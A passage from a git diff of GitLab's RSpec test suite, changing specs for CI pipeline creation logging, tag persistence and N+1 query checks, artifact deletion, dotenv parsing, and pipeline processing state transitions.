
fixture_file_upload('spec/fixtures/rails_sample.png', 'image/png')) } + let_it_be(:upload) { create(:upload, :with_file, :issuable_upload, uploader: FileUploader, model: project) } + let_it_be(:export_path) { Dir.mktmpdir } + + subject(:service) { described_class.new(project, export_path) } + + after do + FileUtils.remove_entry(export_path) if Dir.exist?(export_path) + end + + describe '#execute' do + it 'exports project uploads and avatar' do + subject.execute + + expect(File.exist?(File.join(export_path, 'avatar', 'rails_sample.png'))).to eq(true) + expect(File.exist?(File.join(export_path, upload.secret, upload.retrieve_uploader.filename))).to eq(true) + end + end +end diff --git a/spec/services/ci/create_pipeline_service/logger_spec.rb b/spec/services/ci/create_pipeline_service/logger_spec.rb new file mode 100644 index 00000000000..dfe0859015d --- /dev/null +++ b/spec/services/ci/create_pipeline_service/logger_spec.rb @@ -0,0 +1,139 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::CreatePipelineService do + context 'pipeline logger' do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { project.owner } + + let(:ref) { 'refs/heads/master' } + let(:service) { described_class.new(project, user, { ref: ref }) } + let(:pipeline) { service.execute(:push).payload } + let(:file_location) { 'spec/fixtures/gitlab/ci/external_files/.gitlab-ci-template-1.yml' } + + before do + stub_ci_pipeline_yaml_file(gitlab_ci_yaml) + end + + let(:counters) do + { + 'count' => a_kind_of(Numeric), + 'avg' => a_kind_of(Numeric), + 'max' => a_kind_of(Numeric), + 'min' => a_kind_of(Numeric) + } + end + + let(:loggable_data) do + { + 'pipeline_creation_caller' => 'Ci::CreatePipelineService', + 'pipeline_source' => 'push', + 'pipeline_id' => a_kind_of(Numeric), + 'pipeline_persisted' => true, + 'project_id' => project.id, + 'pipeline_creation_service_duration_s' => a_kind_of(Numeric), + 'pipeline_creation_duration_s' => counters, + 
'pipeline_size_count' => counters, + 'pipeline_step_gitlab_ci_pipeline_chain_seed_duration_s' => counters + } + end + + context 'when the duration is under the threshold' do + it 'does not create a log entry but it collects the data' do + expect(Gitlab::AppJsonLogger).not_to receive(:info) + expect(pipeline).to be_created_successfully + + expect(service.logger.observations_hash) + .to match( + a_hash_including( + 'pipeline_creation_duration_s' => counters, + 'pipeline_size_count' => counters, + 'pipeline_step_gitlab_ci_pipeline_chain_seed_duration_s' => counters + ) + ) + end + end + + context 'when the durations exceeds the threshold' do + let(:timer) do + proc do + @timer = @timer.to_i + 30 + end + end + + before do + allow(Gitlab::Ci::Pipeline::Logger) + .to receive(:current_monotonic_time) { timer.call } + end + + it 'creates a log entry' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(pipeline).to be_created_successfully + end + + context 'when the pipeline is not persisted' do + let(:loggable_data) do + { + 'pipeline_creation_caller' => 'Ci::CreatePipelineService', + 'pipeline_source' => 'push', + 'pipeline_id' => nil, + 'pipeline_persisted' => false, + 'project_id' => project.id, + 'pipeline_creation_service_duration_s' => a_kind_of(Numeric), + 'pipeline_step_gitlab_ci_pipeline_chain_seed_duration_s' => counters + } + end + + before do + allow_next_instance_of(Ci::Pipeline) do |pipeline| + expect(pipeline).to receive(:save!).and_raise { RuntimeError } + end + end + + it 'creates a log entry' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect { pipeline }.to raise_error(RuntimeError) + end + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(ci_pipeline_creation_logger: false) + end + + it 'does not create a log entry' do + expect(Gitlab::AppJsonLogger).not_to 
receive(:info) + + expect(pipeline).to be_created_successfully + expect(service.logger.observations_hash).to eq({}) + end + end + end + + context 'when the size exceeds the threshold' do + before do + allow_next_instance_of(Ci::Pipeline) do |pipeline| + allow(pipeline).to receive(:total_size) { 5000 } + end + end + + it 'creates a log entry' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(pipeline).to be_created_successfully + end + end + end +end diff --git a/spec/services/ci/create_pipeline_service/tags_spec.rb b/spec/services/ci/create_pipeline_service/tags_spec.rb index 335d35010c8..cbbeb870c5f 100644 --- a/spec/services/ci/create_pipeline_service/tags_spec.rb +++ b/spec/services/ci/create_pipeline_service/tags_spec.rb @@ -7,16 +7,15 @@ RSpec.describe Ci::CreatePipelineService do let_it_be(:user) { project.owner } let(:ref) { 'refs/heads/master' } - let(:source) { :push } let(:service) { described_class.new(project, user, { ref: ref }) } - let(:pipeline) { service.execute(source).payload } + let(:pipeline) { create_pipeline } before do - stub_ci_pipeline_yaml_file(config) + stub_yaml_config(config) end context 'with valid config' do - let(:config) { YAML.dump({ test: { script: 'ls', tags: %w[tag1 tag2] } }) } + let(:config) { { test: { script: 'ls', tags: %w[tag1 tag2] } } } it 'creates a pipeline', :aggregate_failures do expect(pipeline).to be_created_successfully @@ -25,8 +24,8 @@ RSpec.describe Ci::CreatePipelineService do end context 'with too many tags' do - let(:tags) { Array.new(50) {|i| "tag-#{i}" } } - let(:config) { YAML.dump({ test: { script: 'ls', tags: tags } }) } + let(:tags) { build_tag_list(label: 'custom', size: 50) } + let(:config) { { test: { script: 'ls', tags: tags } } } it 'creates a pipeline without builds', :aggregate_failures do expect(pipeline).not_to be_created_successfully @@ -34,5 +33,167 @@ RSpec.describe Ci::CreatePipelineService do 
expect(pipeline.yaml_errors).to eq("jobs:test:tags config must be less than the limit of #{Gitlab::Ci::Config::Entry::Tags::TAGS_LIMIT} tags") end end + + context 'tags persistence' do + let(:config) do + { + build: { + script: 'ls', + stage: 'build', + tags: build_tag_list(label: 'build') + }, + test: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: 'test') + } + } + end + + let(:config_without_tags) do + config.transform_values { |job| job.except(:tags) } + end + + context 'with multiple tags' do + context 'when the tags do not exist' do + it 'does not execute N+1 queries' do + stub_yaml_config(config_without_tags) + + # warm up the cached objects so we get a more accurate count + create_pipeline + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + create_pipeline + end + + stub_yaml_config(config) + + # 2 select tags.* + # 1 insert tags + # 1 insert taggings + tags_queries_size = 4 + + expect { pipeline } + .not_to exceed_all_query_limit(control) + .with_threshold(tags_queries_size) + + expect(pipeline).to be_created_successfully + end + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(ci_bulk_insert_tags: false) + end + + it 'executes N+1s queries' do + stub_yaml_config(config_without_tags) + + # warm up the cached objects so we get a more accurate count + create_pipeline + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + create_pipeline + end + + stub_yaml_config(config) + + expect { pipeline } + .to exceed_all_query_limit(control) + .with_threshold(4) + + expect(pipeline).to be_created_successfully + end + end + + context 'when tags are already persisted' do + it 'does not execute N+1 queries' do + # warm up the cached objects so we get a more accurate count + # and insert the tags + create_pipeline + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + create_pipeline + end + + # 1 select tags.* + # 1 insert taggings + tags_queries_size = 2 + + expect 
{ pipeline } + .not_to exceed_all_query_limit(control) + .with_threshold(tags_queries_size) + + expect(pipeline).to be_created_successfully + end + end + end + + context 'with bridge jobs' do + let(:config) do + { + test_1: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: 'test_1') + }, + test_2: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: '$CI_JOB_NAME') + }, + test_3: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: 'test_1') + build_tag_list(label: 'test_2') + }, + test_4: { + script: 'ls', + stage: 'test' + }, + deploy: { + stage: 'deploy', + trigger: 'my/project' + } + } + end + + it do + expect(pipeline).to be_created_successfully + expect(pipeline.bridges.size).to eq(1) + expect(pipeline.builds.size).to eq(4) + + expect(tags_for('test_1')) + .to have_attributes(count: 5) + .and all(match(/test_1-tag-\d+/)) + + expect(tags_for('test_2')) + .to have_attributes(count: 5) + .and all(match(/test_2-tag-\d+/)) + + expect(tags_for('test_3')) + .to have_attributes(count: 10) + .and all(match(/test_[1,2]-tag-\d+/)) + + expect(tags_for('test_4')).to be_empty + end + end + end + end + + def tags_for(build_name) + pipeline.builds.find_by_name(build_name).tag_list + end + + def stub_yaml_config(config) + stub_ci_pipeline_yaml_file(YAML.dump(config)) + end + + def create_pipeline + service.execute(:push).payload + end + + def build_tag_list(label:, size: 5) + Array.new(size) { |index| "#{label}-tag-#{index}" } end end diff --git a/spec/services/ci/create_pipeline_service_spec.rb b/spec/services/ci/create_pipeline_service_spec.rb index c78e19ea62d..ef879d536c3 100644 --- a/spec/services/ci/create_pipeline_service_spec.rb +++ b/spec/services/ci/create_pipeline_service_spec.rb @@ -46,6 +46,47 @@ RSpec.describe Ci::CreatePipelineService do end # rubocop:enable Metrics/ParameterLists + context 'performance' do + it_behaves_like 'pipelines are created without N+1 SQL queries' do + let(:config1) do + <<~YAML + job1: + stage: 
build + script: exit 0 + + job2: + stage: test + script: exit 0 + YAML + end + + let(:config2) do + <<~YAML + job1: + stage: build + script: exit 0 + + job2: + stage: test + script: exit 0 + + job3: + stage: deploy + script: exit 0 + YAML + end + + let(:accepted_n_plus_ones) do + 1 + # SELECT "ci_instance_variables" + 1 + # INSERT INTO "ci_stages" + 1 + # SELECT "ci_builds".* FROM "ci_builds" + 1 + # INSERT INTO "ci_builds" + 1 + # INSERT INTO "ci_builds_metadata" + 1 # SELECT "taggings".* FROM "taggings" + end + end + end + context 'valid params' do let(:pipeline) { execute_service.payload } @@ -1951,6 +1992,75 @@ RSpec.describe Ci::CreatePipelineService do let(:rules_job) { find_job('rules-job') } let(:delayed_job) { find_job('delayed-job') } + context 'with when:manual' do + let(:config) do + <<-EOY + job-with-rules: + script: 'echo hey' + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + + job-when-with-rules: + script: 'echo hey' + when: manual + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + + job-when-with-rules-when: + script: 'echo hey' + when: manual + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + when: on_success + + job-with-rules-when: + script: 'echo hey' + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + when: manual + + job-without-rules: + script: 'echo this is a job with NO rules' + EOY + end + + let(:job_with_rules) { find_job('job-with-rules') } + let(:job_when_with_rules) { find_job('job-when-with-rules') } + let(:job_when_with_rules_when) { find_job('job-when-with-rules-when') } + let(:job_with_rules_when) { find_job('job-with-rules-when') } + let(:job_without_rules) { find_job('job-without-rules') } + + context 'when matching the rules' do + let(:ref_name) { 'refs/heads/master' } + + it 'adds the job-with-rules with a when:manual' do + expect(job_with_rules).to be_persisted + expect(job_when_with_rules).to be_persisted + expect(job_when_with_rules_when).to be_persisted + expect(job_with_rules_when).to be_persisted + 
expect(job_without_rules).to be_persisted + + expect(job_with_rules.when).to eq('on_success') + expect(job_when_with_rules.when).to eq('manual') + expect(job_when_with_rules_when.when).to eq('on_success') + expect(job_with_rules_when.when).to eq('manual') + expect(job_without_rules.when).to eq('on_success') + end + end + + context 'when there is no match to the rule' do + let(:ref_name) { 'refs/heads/wip' } + + it 'does not add job_with_rules' do + expect(job_with_rules).to be_nil + expect(job_when_with_rules).to be_nil + expect(job_when_with_rules_when).to be_nil + expect(job_with_rules_when).to be_nil + expect(job_without_rules).to be_persisted + end + end + end + shared_examples 'rules jobs are excluded' do it 'only persists the job without rules' do expect(pipeline).to be_persisted diff --git a/spec/services/ci/expire_pipeline_cache_service_spec.rb b/spec/services/ci/expire_pipeline_cache_service_spec.rb index 613bbe45e68..8cfe756faf3 100644 --- a/spec/services/ci/expire_pipeline_cache_service_spec.rb +++ b/spec/services/ci/expire_pipeline_cache_service_spec.rb @@ -16,14 +16,16 @@ RSpec.describe Ci::ExpirePipelineCacheService do pipeline_path = "/#{project.full_path}/-/pipelines/#{pipeline.id}.json" graphql_pipeline_path = "/api/graphql:pipelines/id/#{pipeline.id}" graphql_pipeline_sha_path = "/api/graphql:pipelines/sha/#{pipeline.sha}" + graphql_project_on_demand_scan_counts_path = "/api/graphql:on_demand_scan/counts/#{project.full_path}" - expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| - expect(store).to receive(:touch).with(pipelines_path) - expect(store).to receive(:touch).with(new_mr_pipelines_path) - expect(store).to receive(:touch).with(pipeline_path) - expect(store).to receive(:touch).with(graphql_pipeline_path) - expect(store).to receive(:touch).with(graphql_pipeline_sha_path) - end + expect_touched_etag_caching_paths( + pipelines_path, + new_mr_pipelines_path, + pipeline_path, + graphql_pipeline_path, + graphql_pipeline_sha_path, + 
graphql_project_on_demand_scan_counts_path + ) subject.execute(pipeline) end @@ -35,9 +37,10 @@ RSpec.describe Ci::ExpirePipelineCacheService do merge_request_pipelines_path = "/#{project.full_path}/-/merge_requests/#{merge_request.iid}/pipelines.json" merge_request_widget_path = "/#{project.full_path}/-/merge_requests/#{merge_request.iid}/cached_widget.json" - allow_any_instance_of(Gitlab::EtagCaching::Store).to receive(:touch) - expect_any_instance_of(Gitlab::EtagCaching::Store).to receive(:touch).with(merge_request_pipelines_path) - expect_any_instance_of(Gitlab::EtagCaching::Store).to receive(:touch).with(merge_request_widget_path) + expect_touched_etag_caching_paths( + merge_request_pipelines_path, + merge_request_widget_path + ) subject.execute(merge_request.all_pipelines.last) end @@ -76,10 +79,7 @@ RSpec.describe Ci::ExpirePipelineCacheService do it 'updates the cache of dependent pipeline' do dependent_pipeline_path = "/#{source.source_project.full_path}/-/pipelines/#{source.source_pipeline.id}.json" - expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| - allow(store).to receive(:touch) - expect(store).to receive(:touch).with(dependent_pipeline_path) - end + expect_touched_etag_caching_paths(dependent_pipeline_path) subject.execute(pipeline) end @@ -92,13 +92,31 @@ RSpec.describe Ci::ExpirePipelineCacheService do it 'updates the cache of dependent pipeline' do dependent_pipeline_path = "/#{source.project.full_path}/-/pipelines/#{source.pipeline.id}.json" - expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| - allow(store).to receive(:touch) - expect(store).to receive(:touch).with(dependent_pipeline_path) - end + expect_touched_etag_caching_paths(dependent_pipeline_path) subject.execute(pipeline) end end + + it 'does not do N+1 queries' do + subject.execute(pipeline) + + control = ActiveRecord::QueryRecorder.new { subject.execute(pipeline) } + + create(:ci_sources_pipeline, pipeline: pipeline) + create(:ci_sources_pipeline, source_job: 
create(:ci_build, pipeline: pipeline)) + + expect { subject.execute(pipeline) }.not_to exceed_query_limit(control.count) + end + end + + def expect_touched_etag_caching_paths(*paths) + expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| + expect(store).to receive(:touch).and_wrap_original do |m, *args| + expect(args).to include(*paths) + + m.call(*args) + end + end end end diff --git a/spec/services/ci/generate_terraform_reports_service_spec.rb b/spec/services/ci/generate_terraform_reports_service_spec.rb index c9ac74e050c..c32e8bcaeb8 100644 --- a/spec/services/ci/generate_terraform_reports_service_spec.rb +++ b/spec/services/ci/generate_terraform_reports_service_spec.rb @@ -23,7 +23,7 @@ RSpec.describe Ci::GenerateTerraformReportsService do 'create' => 0, 'delete' => 0, 'update' => 1, - 'job_name' => build.options.dig(:artifacts, :name).to_s + 'job_name' => build.name )) ), key: an_instance_of(Array) diff --git a/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb b/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb index 6761f052e18..e71f1a4266a 100644 --- a/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb +++ b/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb @@ -53,6 +53,46 @@ RSpec.describe Ci::JobArtifacts::DestroyAllExpiredService, :clean_gitlab_redis_s log = ActiveRecord::QueryRecorder.new { subject } expect(log.count).to be_within(1).of(8) end + + context 'with several locked-unknown artifact records' do + before do + stub_const("#{described_class}::LOOP_LIMIT", 10) + stub_const("#{described_class}::BATCH_SIZE", 2) + end + + let!(:lockable_artifact_records) do + [ + create(:ci_job_artifact, :metadata, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :junit, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :sast, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: 
locked_job), + create(:ci_job_artifact, :cobertura, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :trace, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job) + ] + end + + let!(:unlockable_artifact_records) do + [ + create(:ci_job_artifact, :metadata, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :junit, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :sast, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :cobertura, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :trace, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + artifact + ] + end + + it 'updates the locked status of job artifacts from artifacts-locked pipelines' do + subject + + expect(lockable_artifact_records).to be_all(&:persisted?) + expect(lockable_artifact_records).to be_all { |artifact| artifact.reload.artifact_artifacts_locked? 
} + end + + it 'unlocks and then destroys job artifacts from artifacts-unlocked pipelines' do + expect { subject }.to change { Ci::JobArtifact.count }.by(-6) + expect(Ci::JobArtifact.where(id: unlockable_artifact_records.map(&:id))).to be_empty + end + end end end diff --git a/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb b/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb index 1cc856734fc..0e7230c042e 100644 --- a/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb +++ b/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb @@ -3,59 +3,74 @@ require 'spec_helper' RSpec.describe Ci::JobArtifacts::DestroyBatchService do - let(:artifacts) { Ci::JobArtifact.all } + let(:artifacts) { Ci::JobArtifact.where(id: [artifact_with_file.id, artifact_without_file.id]) } let(:service) { described_class.new(artifacts, pick_up_at: Time.current) } + let_it_be(:artifact_with_file, refind: true) do + create(:ci_job_artifact, :zip) + end + + let_it_be(:artifact_without_file, refind: true) do + create(:ci_job_artifact) + end + + let_it_be(:undeleted_artifact, refind: true) do + create(:ci_job_artifact) + end + describe '.execute' do subject(:execute) { service.execute } - let_it_be(:artifact, refind: true) do - create(:ci_job_artifact) + it 'creates a deleted object for artifact with attached file' do + expect { subject }.to change { Ci::DeletedObject.count }.by(1) end - context 'when the artifact has a file attached to it' do - before do - artifact.file = fixture_file_upload(Rails.root.join('spec/fixtures/ci_build_artifacts.zip'), 'application/zip') - artifact.save! - end + it 'does not remove the attached file' do + expect { execute }.not_to change { artifact_with_file.file.exists? 
} + end - it 'creates a deleted object' do - expect { subject }.to change { Ci::DeletedObject.count }.by(1) - end + it 'deletes the artifact records' do + expect { subject }.to change { Ci::JobArtifact.count }.by(-2) + end - it 'does not remove the files' do - expect { execute }.not_to change { artifact.file.exists? } + it 'reports metrics for destroyed artifacts' do + expect_next_instance_of(Gitlab::Ci::Artifacts::Metrics) do |metrics| + expect(metrics).to receive(:increment_destroyed_artifacts_count).with(2).and_call_original + expect(metrics).to receive(:increment_destroyed_artifacts_bytes).with(107464).and_call_original end - it 'reports metrics for destroyed artifacts' do - expect_next_instance_of(Gitlab::Ci::Artifacts::Metrics) do |metrics| - expect(metrics).to receive(:increment_destroyed_artifacts_count).with(1).and_call_original - expect(metrics).to receive(:increment_destroyed_artifacts_bytes).with(107464).and_call_original - end + execute + end + + context 'ProjectStatistics' do + it 'resets project statistics' do + expect(ProjectStatistics).to receive(:increment_statistic).once + .with(artifact_with_file.project, :build_artifacts_size, -artifact_with_file.file.size) + .and_call_original + expect(ProjectStatistics).to receive(:increment_statistic).once + .with(artifact_without_file.project, :build_artifacts_size, 0) + .and_call_original execute end - context 'ProjectStatistics' do - it 'resets project statistics' do - expect(ProjectStatistics).to receive(:increment_statistic).once - .with(artifact.project, :build_artifacts_size, -artifact.file.size) - .and_call_original + context 'with update_stats: false' do + it 'does not update project statistics' do + expect(ProjectStatistics).not_to receive(:increment_statistic) - execute + service.execute(update_stats: false) end - context 'with update_stats: false' do - it 'does not update project statistics' do - expect(ProjectStatistics).not_to receive(:increment_statistic) - - service.execute(update_stats: 
false) - end + it 'returns size statistics' do + expected_updates = { + statistics_updates: { + artifact_with_file.project => -artifact_with_file.file.size, + artifact_without_file.project => 0 + } + } - it 'returns size statistics' do - expect(service.execute(update_stats: false)).to match( - a_hash_including(statistics_updates: { artifact.project => -artifact.file.size })) - end + expect(service.execute(update_stats: false)).to match( + a_hash_including(expected_updates)) end end end @@ -71,7 +86,7 @@ RSpec.describe Ci::JobArtifacts::DestroyBatchService do it 'raises an exception and stop destroying' do expect { execute }.to raise_error(ActiveRecord::RecordNotDestroyed) - .and not_change { Ci::JobArtifact.count }.from(1) + .and not_change { Ci::JobArtifact.count } end end end diff --git a/spec/services/ci/parse_dotenv_artifact_service_spec.rb b/spec/services/ci/parse_dotenv_artifact_service_spec.rb index c4040a426f2..6bf22b7c8b2 100644 --- a/spec/services/ci/parse_dotenv_artifact_service_spec.rb +++ b/spec/services/ci/parse_dotenv_artifact_service_spec.rb @@ -23,6 +23,46 @@ RSpec.describe Ci::ParseDotenvArtifactService do hash_including('key' => 'KEY2', 'value' => 'VAR2')) end + context 'when dotenv variables are conflicting against manual variables' do + before do + create(:ci_job_variable, job: build, key: 'KEY1') + end + + it 'returns an error message that there is a duplicate variable' do + subject + + expect(subject[:status]).to eq(:error) + expect(subject[:message]).to include("Key (key, job_id)=(KEY1, #{build.id}) already exists.") + expect(subject[:http_status]).to eq(:bad_request) + end + end + + context 'when dotenv variables have duplicate variables' do + let!(:artifact) { create(:ci_job_artifact, :dotenv, job: build) } + let(:blob) do + <<~EOS + KEY1=VAR1 + KEY2=VAR2 + KEY2=VAR3 + KEY1=VAR4 + EOS + end + + before do + allow(artifact).to receive(:each_blob).and_yield(blob) + end + + it 'latest values get used' do + subject + + 
expect(subject[:status]).to eq(:success) + + expect(build.job_variables.as_json).to contain_exactly( + hash_including('key' => 'KEY1', 'value' => 'VAR4'), + hash_including('key' => 'KEY2', 'value' => 'VAR3')) + end + end + context 'when parse error happens' do before do allow(service).to receive(:scan_line!) { raise described_class::ParserError, 'Invalid Format' } diff --git a/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb b/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb index a66d3898c5c..02f8f2dd99f 100644 --- a/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb +++ b/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb @@ -1,12 +1,1106 @@ # frozen_string_literal: true require 'spec_helper' -require_relative 'shared_processing_service' -require_relative 'shared_processing_service_tests_with_yaml' RSpec.describe Ci::PipelineProcessing::AtomicProcessingService do - it_behaves_like 'Pipeline Processing Service' - it_behaves_like 'Pipeline Processing Service Tests With Yaml' + describe 'Pipeline Processing Service Tests With Yaml' do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { project.owner } + + where(:test_file_path) do + Dir.glob(Rails.root.join('spec/services/ci/pipeline_processing/test_cases/*.yml')) + end + + with_them do + let(:test_file) { YAML.load_file(test_file_path) } + let(:pipeline) { Ci::CreatePipelineService.new(project, user, ref: 'master').execute(:pipeline).payload } + + before do + stub_ci_pipeline_yaml_file(YAML.dump(test_file['config'])) + end + + it 'follows transitions' do + expect(pipeline).to be_persisted + Sidekiq::Worker.drain_all # ensure that all async jobs are executed + check_expectation(test_file.dig('init', 'expect'), "init") + + test_file['transitions'].each_with_index do |transition, idx| + event_on_jobs(transition['event'], transition['jobs']) + Sidekiq::Worker.drain_all # ensure that all async jobs are executed + 
check_expectation(transition['expect'], "transition:#{idx}") + end + end + + private + + def check_expectation(expectation, message) + expect(current_state.deep_stringify_keys).to eq(expectation), message + end + + def current_state + # reload pipeline and all relations + pipeline.reload + + { + pipeline: pipeline.status, + stages: pipeline.stages.pluck(:name, :status).to_h, + jobs: pipeline.latest_statuses.pluck(:name, :status).to_h + } + end + + def event_on_jobs(event, job_names) + statuses = pipeline.latest_statuses.by_name(job_names).to_a + expect(statuses.count).to eq(job_names.count) # ensure that we have the same counts + + statuses.each do |status| + if event == 'play' + status.play(user) + else + status.public_send("#{event}!") + end + end + end + end + end + + describe 'Pipeline Processing Service' do + let(:project) { create(:project, :repository) } + let(:user) { project.owner } + + let(:pipeline) do + create(:ci_empty_pipeline, ref: 'master', project: project) + end + + context 'when simple pipeline is defined' do + before do + create_build('linux', stage_idx: 0) + create_build('mac', stage_idx: 0) + create_build('rspec', stage_idx: 1) + create_build('rubocop', stage_idx: 1) + create_build('deploy', stage_idx: 2) + end + + it 'processes a pipeline', :sidekiq_inline do + expect(process_pipeline).to be_truthy + + succeed_pending + + expect(builds.success.count).to eq(2) + + succeed_pending + + expect(builds.success.count).to eq(4) + + succeed_pending + + expect(builds.success.count).to eq(5) + end + + it 'does not process pipeline if existing stage is running' do + expect(process_pipeline).to be_truthy + expect(builds.pending.count).to eq(2) + + expect(process_pipeline).to be_falsey + expect(builds.pending.count).to eq(2) + end + end + + context 'custom stage with first job allowed to fail' do + before do + create_build('clean_job', stage_idx: 0, allow_failure: true) + create_build('test_job', stage_idx: 1, allow_failure: true) + end + + it 
'automatically triggers a next stage when build finishes', :sidekiq_inline do + expect(process_pipeline).to be_truthy + expect(builds_statuses).to eq ['pending'] + + fail_running_or_pending + + expect(builds_statuses).to eq %w(failed pending) + + fail_running_or_pending + + expect(pipeline.reload).to be_success + end + end + + context 'when optional manual actions are defined', :sidekiq_inline do + before do + create_build('build', stage_idx: 0) + create_build('test', stage_idx: 1) + create_build('test_failure', stage_idx: 2, when: 'on_failure') + create_build('deploy', stage_idx: 3) + create_build('production', stage_idx: 3, when: 'manual', allow_failure: true) + create_build('cleanup', stage_idx: 4, when: 'always') + create_build('clear:cache', stage_idx: 4, when: 'manual', allow_failure: true) + end + + context 'when builds are successful' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test deploy production) + expect(builds_statuses).to eq %w(success success pending manual) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test deploy production cleanup clear:cache) + expect(builds_statuses).to eq %w(success success success manual pending manual) + + succeed_running_or_pending + + expect(builds_statuses).to eq %w(success success success manual success manual) + expect(pipeline.reload.status).to eq 'success' + end + end + + context 'when test job fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq 
%w(success pending) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test test_failure) + expect(builds_statuses).to eq %w(success failed pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test test_failure cleanup) + expect(builds_statuses).to eq %w(success failed success pending) + + succeed_running_or_pending + + expect(builds_statuses).to eq %w(success failed success success) + expect(pipeline.reload.status).to eq 'failed' + end + end + + context 'when test and test_failure jobs fail' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test test_failure) + expect(builds_statuses).to eq %w(success failed pending) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test test_failure cleanup) + expect(builds_statuses).to eq %w(success failed failed pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test test_failure cleanup) + expect(builds_statuses).to eq %w(success failed failed success) + expect(pipeline.reload.status).to eq('failed') + end + end + + context 'when deploy job fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test deploy production) + expect(builds_statuses).to eq %w(success success pending manual) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test deploy production cleanup) + expect(builds_statuses).to eq 
%w(success success failed manual pending) + + succeed_running_or_pending + + expect(builds_statuses).to eq %w(success success failed manual success) + expect(pipeline.reload).to be_failed + end + end + + context 'when build is canceled in the second stage' do + it 'does not schedule builds after build has been canceled' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds.running_or_pending).not_to be_empty + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + cancel_running_or_pending + + expect(builds.running_or_pending).to be_empty + expect(builds_names).to eq %w[build test] + expect(builds_statuses).to eq %w[success canceled] + expect(pipeline.reload).to be_canceled + end + end + + context 'when listing optional manual actions' do + it 'returns only for skipped builds' do + # currently all builds are created + expect(process_pipeline).to be_truthy + expect(manual_actions).to be_empty + + # succeed stage build + succeed_running_or_pending + + expect(manual_actions).to be_empty + + # succeed stage test + succeed_running_or_pending + + expect(manual_actions).to be_one # production + + # succeed stage deploy + succeed_running_or_pending + + expect(manual_actions).to be_many # production and clear cache + end + end + end + + context 'when delayed jobs are defined', :sidekiq_inline do + context 'when the scene is timed incremental rollout' do + before do + create_build('build', stage_idx: 0) + create_build('rollout10%', **delayed_options, stage_idx: 1) + create_build('rollout100%', **delayed_options, stage_idx: 2) + create_build('cleanup', stage_idx: 3) + + 